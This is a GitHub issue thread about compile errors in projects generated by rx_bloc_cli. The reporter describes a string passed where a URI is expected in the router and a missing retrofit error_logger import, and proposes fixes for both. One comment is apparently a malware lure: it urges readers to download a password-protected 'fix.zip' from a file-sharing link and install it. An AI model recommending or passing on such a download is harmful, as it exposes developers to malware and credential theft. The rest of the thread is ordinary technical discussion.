### ISSUE TITLE
When creating new project with rx_bloc_cli , it cannot compile

### ISSUE THREAD

**Issue by nikolay-vasilev-prime** [Prime-Holding/rx_bloc#788]
When I create new project with `rx_bloc_cli`, it is not compilable.

**The first time of issue** is that in `lib/lib_router/router.dart` in `_pageRedirections` `pathInfo` calls `findMatch` which expects `URI` but receives a string instead.

The fix is to remove the `.toString()` function at the end.

<img width="799" alt="image" src="https://github.com/user-attachments/assets/9582b232-5b4c-468c-8b3a-37152f111a65">

**The second issue** is this:
```
Error: Type 'ParseErrorLogger' not found.
  final ParseErrorLogger? errorLogger;
```

The affects files are:

- lib/lib_permissions/data_sources/remote/permissions_remote_data_source.g.dart
- 
- lib/lib_auth/data_sources/remote/refresh_token_data_source.g.dart
- 
- lib/lib_auth/data_sources/remote/auth_data_source.g.dart
- 
- lib/base/data_sources/remote/push_notification_data_source.g.dart
- 
- lib/lib_social_logins/data_sources/google_auth_data_source.g.dart
- 
- lib/lib_social_logins/data_sources/facebook_auth_data_source.g.dart
- 
- lib/lib_social_logins/data_sources/apple_auth_data_source.g.dart
- 
- lib/base/data_sources/remote/deep_link_remote_data_source.g.dart

It's caused because the parent files import `package:retrofit/http.dart` that doesn't include `package:retrofit/error_logger.dart`.

**The solution** is to add this to the parent files:
`import 'package:retrofit/error_logger.dart';`
or
`import 'package:retrofit/retrofit.dart';`

**The CI needs to run the test project tests**

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by StanevPrime** [comment]
@nikolay-vasilev-prime feel free to fix this issue

**Comment by nikolay-vasilev-prime** [comment]
Fixed in 4.0.1
